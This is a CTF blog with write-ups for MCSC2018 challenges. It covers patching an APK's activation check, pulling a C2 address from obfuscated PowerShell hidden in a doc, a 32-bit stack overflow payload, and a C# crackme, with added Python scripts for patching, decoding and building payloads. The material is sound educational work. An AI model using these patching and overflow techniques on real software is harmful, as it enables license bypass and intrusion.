Wednesday, January 31, 2018

[MCSC] patch me bro-100pts - Writeup [/Misc]






The challenge description is "Patch this app", so we need to modify the application: recompile it, flip a bit, something like that.
First I downloaded the challenge file; the challenge provides a mobile application (apk) file.
I tried decompiling it with d2j-dex2jar to get more readable Java source, which makes it easier to understand.



In MainActivity.class we can clearly see in the source code:
String isActivated = "0";
so isActivated is initialized to "0".

In the checkActivation() function,
isActivated is compared with "1":
if not equal, the bad-boy message "You are not activated yet";
if equal, the good-boy message "Congratulations, You have patched challenge".

So let's patch "0" to "1" in the isActivated variable.
First we decompile the apk file with apktool to get the smali code.

apktool d mcsc_misc2.apk



In the file ./mcsc_misc2/smali/myanmar/mcsc/challenge2/MainActivity.smali

change "0"


to "1"



Then rebuild the smali source with apktool:
apktool b mcsc_misc2/



The application needs to be signed before it can be installed on Android; I used jarsigner to sign it.

 

Now the patched application is ready to install on Android.
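The steps above, decompile, edit the one const-string that feeds isActivated, rebuild and sign, as one script. This is an added example, not the commands from the original write-up. SAMPLE_SMALI is constructed to resemble what apktool emits for `String isActivated = "0";` in a constructor (register numbers in the real file may differ), and the keystore alias and password are placeholders; apktool, keytool and jarsigner are assumed to be on PATH.

```python
"""Patch the isActivated initializer in MainActivity.smali, then rebuild and sign."""
import re
import subprocess
import sys
from pathlib import Path
from typing import Tuple

# Field reference built from the class path seen in the apktool output directory.
FIELD = "Lmyanmar/mcsc/challenge2/MainActivity;->isActivated:Ljava/lang/String;"

# Only rewrite a const-string whose register is then stored into isActivated,
# so other "0" literals in the class are left alone.
_STORE = re.compile(
    r'(const-string(?:/jumbo)?\s+(?P<reg>[vp]\d+),\s*)"(?P<val>[^"]*)"'
    r'(?P<gap>\s*(?:\.line\s+\d+\s*)?iput-object\s+(?P=reg),\s*[vp]\d+,\s*'
    + re.escape(FIELD) + r')'
)

# Constructed sample (assumption), not the real MainActivity.smali.
SAMPLE_SMALI = """\
.field isActivated:Ljava/lang/String;

.method public constructor <init>()V
    .locals 1

    .line 9
    invoke-direct {p0}, Landroid/support/v7/app/AppCompatActivity;-><init>()V

    .line 11
    const-string v0, "0"

    iput-object v0, p0, Lmyanmar/mcsc/challenge2/MainActivity;->isActivated:Ljava/lang/String;

    return-void
.end method

.method private log()V
    .locals 2

    const-string v0, "MCSC"

    const-string v1, "0"

    invoke-static {v0, v1}, Landroid/util/Log;->d(Ljava/lang/String;Ljava/lang/String;)I

    return-void
.end method
"""


def patch_smali(text: str, old: str = "0", new: str = "1") -> Tuple[str, int]:
    """Return (patched text, number of isActivated initializers changed)."""
    count = 0

    def repl(m: "re.Match") -> str:
        nonlocal count
        if m.group("val") != old:
            return m.group(0)
        count += 1
        return f'{m.group(1)}"{new}"{m.group("gap")}'

    return _STORE.sub(repl, text), count


def rebuild_and_sign(apk: Path, workdir: Path, keystore: Path, alias: str = "patch") -> Path:
    """apktool d -> patch smali -> apktool b -> jarsigner. Returns the signed apk path."""
    subprocess.run(["apktool", "d", "-f", "-o", str(workdir), str(apk)], check=True)
    smali = workdir / "smali/myanmar/mcsc/challenge2/MainActivity.smali"
    patched, n = patch_smali(smali.read_text())
    if n != 1:
        sys.exit(f"expected exactly one isActivated store, patched {n}")
    smali.write_text(patched)
    out = workdir.with_suffix(".patched.apk")
    subprocess.run(["apktool", "b", "-o", str(out), str(workdir)], check=True)
    # apktool's output is unsigned; the Android package installer rejects it until it is signed.
    if not keystore.exists():  # placeholder credentials, fine for a CTF device
        subprocess.run(["keytool", "-genkeypair", "-keystore", str(keystore), "-alias", alias,
                        "-keyalg", "RSA", "-keysize", "2048", "-validity", "10000",
                        "-storepass", "password", "-keypass", "password",
                        "-dname", "CN=patch"], check=True)
    subprocess.run(["jarsigner", "-keystore", str(keystore), "-storepass", "password",
                    "-sigalg", "SHA1withRSA", "-digestalg", "SHA1", str(out), alias], check=True)
    return out


if __name__ == "__main__":
    apk_path = Path(sys.argv[1]) if len(sys.argv) > 1 else Path("mcsc_misc2.apk")
    print(rebuild_and_sign(apk_path, Path("mcsc_misc2"), Path("patch.keystore")))
```

The regex anchors on the iput-object into the isActivated field rather than on the literal "0", which matters because a class usually has several "0" strings and patching the wrong one leaves the check untouched; the script refuses to build if it did not change exactly one.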



Just click the CHECK PATCH button to get the flag! Yay!

Decrypted text: this is testing

Just wrap it in the flag format mcsc{} and I got the flag.

flag : mcsc{this is testing}




This is the seventh challenge I solved in MCSC2018,
but this time we were not the first-solver team.

Note
Text updated
12.07.2020
I want to thank the challenge creator.

Tuesday, January 30, 2018

[MCSC] Find the Tom's Address-50pts - Writeup [/Forensic]



Honestly, I don't know much about forensics; I have only a little knowledge.
One of my team members said, "Hey, can you check this? There is some obfuscated code inside the doc."

First I read the challenge description: oops, I need to find Tom's address. The challenge provides a doc file. I took a quick look with Microsoft Office in a VM
and saw some text from Wikipedia.


I thought I needed to find the real address of Tom -_-
Yes, I did at that time.


I copied some text from Wikipedia and tried to diff it, but nothing special. (In some challenges the creator hides the secret word in the text, which is why I tried diffing.)
So I moved on to the obfuscated code!



Searching inside the doc file with Microsoft Office, I found another embedded file? (Tom History)


I copied that file to the desktop.

The file name changed to mcsc2.bat



I opened it with Notepad++

and saw the content of the file.



There are two lines.
The first line is not readable; the second line is obfuscated PowerShell code.
I removed the first line and changed the view to "Word wrap" (in Notepad++: View >> Word wrap).



Now we can see some more code.

I tried to decode the obfuscated PowerShell code, but that took too much time, maybe because I had not experienced it before.
So I ignored this challenge at that time and played with another challenge.
The first part of the competition ended at 12:00 PM.

After the second part of the competition started,
the challenge creator announced some hints to us:
"There is a malware in that doc, you need to find the command & control address, you don't need to do any decoding"

I looked at the challenge again; I already had the content of the malware file.
So I searched that PowerShell code again for something like "mcsc|http|80|443|8080|8888".

and I saw something.






So, decode the part of the script that holds the flag:

("{0}{4}{2}{1}{6}{7}{8}{5}{9}{3}"-f 'ht','c.','/mcs','uu:80','tp:/','f0UND','h3yJe','rr','y','u')



I decoded it with Python
and got the flag.

mcsc{h3yJerryf0UNDuuu}
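The decode step above, generalised to any `-f` format-operator expression in the script, plus the grep the write-up did by hand. This is an added example, not the Python the author used. The OBFUSCATED line is the expression quoted above; the helpers assume the script's other `-f` expressions use the same single-quoted-argument style, and other layers such as `[char]` arithmetic or `-join` are not handled.

```python
"""Decode PowerShell '-f' (format operator) string obfuscation and grep the result."""
import re
from typing import List, Tuple

# ( "<format>" -f 'arg0','arg1',... )
FORMAT_EXPR = re.compile(r'\(\s*"(?P<fmt>[^"]*)"\s*-[fF]\s*(?P<args>[^)]*)\)')
SQ_STRING = re.compile(r"'((?:[^']|'')*)'")   # PowerShell writes ' as '' inside single quotes
PLACEHOLDER = re.compile(r"\{(\d+)\}")
# The terms the write-up grepped for, as one pattern.
INDICATOR = re.compile(r"mcsc|https?://|:(?:80|443|8080|8888)\b", re.IGNORECASE)

# The expression quoted in the write-up.
OBFUSCATED = """("{0}{4}{2}{1}{6}{7}{8}{5}{9}{3}"-f 'ht','c.','/mcs','uu:80','tp:/','f0UND','h3yJe','rr','y','u')"""


def apply_format(fmt: str, args: List[str]) -> str:
    """Fill the {N} placeholders from args, as PowerShell's -f operator does."""
    return PLACEHOLDER.sub(lambda m: args[int(m.group(1))], fmt)


def decode_format_operators(script: str) -> List[Tuple[str, str]]:
    """Every (original expression, decoded string) pair found in the script."""
    results = []
    for m in FORMAT_EXPR.finditer(script):
        args = [a.replace("''", "'") for a in SQ_STRING.findall(m.group("args"))]
        results.append((m.group(0), apply_format(m.group("fmt"), args)))
    return results


def find_c2(script: str) -> List[str]:
    """Decoded strings that look like a URL, host or port of interest."""
    return [s for _, s in decode_format_operators(script) if INDICATOR.search(s)]


def flag_from_url(url: str) -> str:
    """The host label after 'mcsc.' in the flag format, per the write-up's final step."""
    host = re.sub(r"^\w+://", "", url).split(":")[0]
    return "mcsc{" + host.split("mcsc.", 1)[1] + "}"


if __name__ == "__main__":
    for expr, decoded in decode_format_operators(OBFUSCATED):
        print(expr, "->", decoded)
    for hit in find_c2(OBFUSCATED):
        print("C2 candidate:", hit, "flag:", flag_from_url(hit))
```

Running it prints the reassembled URL, http://mcsc.h3yJerryf0UNDuuu:80, which is the hint's "command & control address": the `-f` trick only reorders fragments, so no cryptographic decoding is needed, just evaluating the placeholders in order. On a real sample, run the decoder before the grep, since the indicator strings never appear intact in the obfuscated text.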




 



This challenge had already come out in the first part of the CTF, but we solved it in the second part.
(Note: I submitted many wrong flags for this challenge.)

This is the sixth challenge I solved in MCSC2018,
and we were the first-solver team for this challenge, so we got another bonus (1 point). Yay!
I want to thank the challenge creator.

[MCSC] babypwn-100pts - Writeup [/PWN]



First, let's take a look with the file command.




It is a 32-bit ELF file.
The first thing I did was run the binary.
The first time, I entered AAAA as input and the program exited normally.
Next I entered an input large enough to cause a buffer overflow,
and the buffer overflow happened [ Segmentation fault (core dumped) ]




 
Since there is a buffer overflow, we need to find the buffer offset.

Ok let open with gdb,

One thing to know here is that this is a stripped binary, so the function names have been removed.

We have to start by finding the binary's entry point (because the binary is stripped).



Entry point: 0x8048420
Now we have the entry point address.




The main function calls another function at 0x8048531.
Let's disassemble 0x8048531.



As the picture shows,
mov    DWORD PTR [ebp-0x4],0xdeadc0de
assigns 0xdeadc0de to a local variable.
lea    eax,[ebp-0x68]
takes the address of the buffer at ebp-0x68 (0x68 = 104 bytes below ebp, so the buffer starts 0x64 = 100 bytes below the local at ebp-0x4).
Then
mov    DWORD PTR [esp+0x4],eax
stores that pointer at esp+0x4, as argument 1 of scanf,
mov    DWORD PTR [esp],0x8048702
and sets scanf's argument 0 to the "%s" format string.

Then
call   0x8048410 <__isoc99_scanf@plt>
calls scanf(). scanf("%s") copies input with no length limit, so this is where the buffer overflow happens.



Finally,
cmp    DWORD PTR [ebp-0x4],0xdeadbeef

compares the local against 0xdeadbeef. ebp-0x4 was already set to 0xdeadc0de above.
If we enter more than 100 bytes (0x68 - 0x4) of input, we can overwrite ebp-0x4.
Here I set two breakpoints: one before the scanf call and one after it.
The first breakpoint is at 0x0804858e and the second at 0x0804859a; then
run the program.
When the program runs it will stop at the first breakpoint.
Look at the picture below.



$ebp-0x4 has been assigned the value 0xdeadc0de.
Then continue the program.

Enter the input A*100+"BBBB" ( AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB )

and press Enter; the program will pause at the
second breakpoint.



When the program pauses,
to see what value overwrote the $ebp-0x4 address, type
x/wx $ebp-0x4
and it shows 0x42424242;
0x42 is the hex value of B.
So we are able to overwrite the $ebp-0x4 address.



As the picture shows, if $ebp-0x4 equals 0xdeadbeef we get the flag; otherwise
it jumps to 0x80485b6.
So we need to make the overwritten
$ebp-0x4 contain 0xdeadbeef,
which means:

python -c 'print "A"*100+"\xef\xbe\xad\xde"' > exp
We write "\xef\xbe\xad\xde" instead of 0xdeadbeef because x86 is little-endian. (This is Python 2; under Python 3, print would UTF-8-encode those bytes, so write raw bytes instead.)
Then
in gdb run
r < exp
and when we run it again,



Now the $ebp-0x4 address has been overwritten with 0xdeadbeef.
Running it against the real server
gives the flag.
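The payload above as a Python 3 script, with the offset derived from the two frame offsets in the disassembly and a cyclic-pattern helper for the general case where the offset cannot be read off the disassembly. This is an added example, not the write-up's one-liner. The buffer offset (ebp-0x68), the checked local (ebp-0x4) and the value 0xdeadbeef come from the disassembly above; everything else is general technique.

```python
"""Build the babypwn payload and, more generally, recover an overwrite offset."""
import struct
from functools import lru_cache

BUF_OFFSET = 0x68      # lea eax,[ebp-0x68]: scanf("%s") writes from here
TARGET_OFFSET = 0x4    # cmp DWORD PTR [ebp-0x4],0xdeadbeef
MAGIC = 0xDEADBEEF

# Bytes scanf("%s") will not copy into the buffer: it stops at whitespace,
# and the resulting C string ends at the first NUL.
_BAD_BYTES = b" \t\n\r\x0b\x0c\x00"


def overwrite_offset(buf_off: int = BUF_OFFSET, target_off: int = TARGET_OFFSET) -> int:
    """Distance from the start of the buffer to the checked local (0x68 - 0x4 = 100)."""
    return buf_off - target_off


def is_scanf_safe(payload: bytes) -> bool:
    return not any(b in _BAD_BYTES for b in payload)


def build_payload(offset: int, value: int = MAGIC) -> bytes:
    """Filler up to the local, then the value packed little-endian (x86)."""
    payload = b"A" * offset + struct.pack("<I", value)
    if not is_scanf_safe(payload):
        raise ValueError("payload contains a byte scanf('%s') would stop at")
    return payload


@lru_cache(maxsize=None)
def de_bruijn(alphabet: bytes = b"abcdefghijklmnopqrstuvwxyz", n: int = 4) -> bytes:
    """de Bruijn sequence B(k, n): every n-byte window occurs exactly once, so the
    4 bytes that land in a register or local identify a single offset."""
    k = len(alphabet)
    a = [0] * (k * n)
    seq = []

    def db(t: int, p: int) -> None:
        if t > n:
            if n % p == 0:
                seq.extend(a[1:p + 1])
        else:
            a[t] = a[t - p]
            db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                db(t + 1, t)

    db(1, 1)
    return bytes(alphabet[i] for i in seq)


def cyclic(length: int) -> bytes:
    """Pattern to feed the program instead of "AAAA..." when probing for the offset."""
    return de_bruijn()[:length]


def pattern_dword(offset: int) -> int:
    """The little-endian dword a read at `offset` of the pattern produces,
    i.e. what gdb would show in $ebp-0x4 (or eip) after the crash."""
    return struct.unpack("<I", cyclic(offset + 4)[offset:])[0]


def cyclic_find(dword: int) -> int:
    """Map that dword back to its offset in the pattern (-1 if not found)."""
    return de_bruijn().find(struct.pack("<I", dword))


if __name__ == "__main__":
    import sys
    # Same bytes as the write-up's one-liner, written raw so Python 3 does not UTF-8-encode them.
    sys.stdout.buffer.write(build_payload(overwrite_offset()))
```

Run `python3 exploit.py > exp` and then `r < exp` in gdb, exactly as above; the same bytes can be piped to the remote service. The scanf("%s") check matters when the target value is not 0xdeadbeef: a value containing 0x20 or 0x0a would be cut short and the local would end up holding the wrong dword.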



Thanks for reading





This is the fifth challenge I solved in MCSC2018,
and we were the first-solver team for this challenge, so we got another bonus (1 point). Yay!

I want to thank the challenge creator.

Monday, January 29, 2018

[MCSC] evilpython2-100pts - Writeup [/PWN]

After solving the CrackMe02 challenge, I tried evilpython2-100pts.






This time, they also provided the source code.



There is an UNWANTED variable in this challenge's source,
but I tried the payload I had used in the evilpython-50pts challenge,
and that payload still worked!



Flag : mcsc{exec_is_evil_t00}
Bingo!





Thanks for reading.


This is the fourth challenge I solved in MCSC2018,
and we were the first-solver team for this challenge, so we got another bonus (1 point).

I want to say thank you to challenge creator.

[MCSC] CrackMe02-100pts - Writeup [/REVERSING]

At that time, I decided to solve this challenge!







When I downloaded the challenge files,
the challenge provided two files (a binary exe and a library dll), both written in C#.
I took a quick look with CFF Explorer.



So we need to debug/decompile.
I used dnSpy, which is a great tool for debugging C# programs.

When I opened the binary exe with dnSpy, I clicked the main entry point.



The main binary loads another DLL file (System.Data.Win32.dll) with Systems.Load.
When I clicked on "new D34783ADEFF89289127037FED9()", the debugger loaded that DLL (System.Data.Win32.dll), cool!
Once the DLL is loaded, the program starts with "InitializeComponent()".

 

Wait!

On line 55: this.label1.Text = Window.Forms("Sqfpp#Bmz#Hfz#wl#dvfpp##FBPWFQ#FDD-", 3);
That should be plain text!
So there must be a decrypt function in the DLL file.
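Before stepping into the DLL, it is worth trying the cheap transforms on that string, since the second argument is a small integer. This is an added example, not the decompiled Window.Forms() routine. The ciphertext and the argument 3 are quoted from line 55 above; that the real routine is a byte-wise XOR with that argument is an assumption, chosen because it is the transform under which the string becomes readable, and the frequency-based brute force shows the key could be recovered even if it were not sitting in the call.

```python
"""Recover the label text from the obfuscated string on line 55."""
CIPHERTEXT = "Sqfpp#Bmz#Hfz#wl#dvfpp##FBPWFQ#FDD-"
KEY = 3   # second argument of Window.Forms(...) in the decompiled code


def xor_chars(s: str, key: int) -> str:
    """XOR every character with a single-byte key; the operation is its own inverse."""
    return "".join(chr(ord(c) ^ key) for c in s)


def decode_label(s: str = CIPHERTEXT, key: int = KEY) -> str:
    # Assumption: Window.Forms(text, n) is a per-character XOR with n.
    return xor_chars(s, key)


# Relative letter frequencies of English text (percent), plus a weight for space.
_FREQ = dict(zip("etaoinshrdlcumwfgypbvkjxqz",
                 [12.7, 9.1, 8.2, 7.5, 7.0, 6.7, 6.3, 6.1, 6.0, 4.3, 4.0, 2.8, 2.8,
                  2.4, 2.4, 2.2, 2.0, 2.0, 1.9, 1.5, 1.0, 0.8, 0.15, 0.15, 0.1, 0.07]))


def english_score(s: str) -> float:
    """Higher for text that looks like English; non-printable bytes are penalised."""
    score = 0.0
    for c in s:
        if c == " ":
            score += 13.0
        elif c.isascii() and c.isalpha():
            score += _FREQ[c.lower()]
        elif not 32 <= ord(c) < 127:
            score -= 100.0
    return score


def best_xor_key(s: str) -> int:
    """Brute-force all 256 single-byte keys and keep the most English-looking result."""
    return max(range(256), key=lambda k: english_score(xor_chars(s, k)))


if __name__ == "__main__":
    k = best_xor_key(CIPHERTEXT)
    print(f"best key {k}: {xor_chars(CIPHERTEXT, k)!r}")
    print(f"key {KEY}:  {decode_label()!r}")
```

With key 3 the label reads as a prompt to press a key, which matches the key-event handlers described next; the '#' characters are the spaces (0x23 ^ 3 = 0x20), which is why the obfuscated string has so many of them.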

But there is another interesting pair of key event handlers:
base.KeyDown += new KeyEventHandler(this.D34783ADEFF89289127037FED9_2);
base.KeyPress += new KeyPressEventHandler(this.D34783ADEFF89289127037FED9_1);

 

Hmm!
When we press Ctrl+Alt+Shift+0 (Keys.D0),

the Applications.Exit() function executes.

OR,
when any key is pressed,
the Applications.Resume() function executes.

Note: don't confuse this with Application.Exit(); the challenge's class is Applications, with an s, not the WinForms Application class.
Let's check what these are!



I set a breakpoint on both functions.

Then I debugged the program and pressed any key on my keyboard, because I wanted to debug the Applications.Resume() function first.

The debugger broke at the Resume() breakpoint.



Press F11 in the debugger (step into),
and I saw the decrypt function.



After setting a breakpoint on the return line for the stringBuilder2 variable and pressing F5, stringBuilder2 became "wrong key".



OK, just press F5 to continue the program.
Now let's debug the Applications.Exit() function: I pressed Ctrl+Alt+Shift+0,
and the debugger broke at the Applications.Exit() function.
Press F5 to continue; the debugger breaks at return stringBuilder2.ToString(),
and I saw the flag in the stringBuilder2 variable.
Yay!



flag : Myanmar_Cyber_Security_Challenge






Thanks for reading.

This is the third challenge I solved in MCSC2018,
and we were the first-solver team for this challenge, so we got another bonus (1 point).

I want to say thank you to Ko Myo Myint Htike who created this challenge.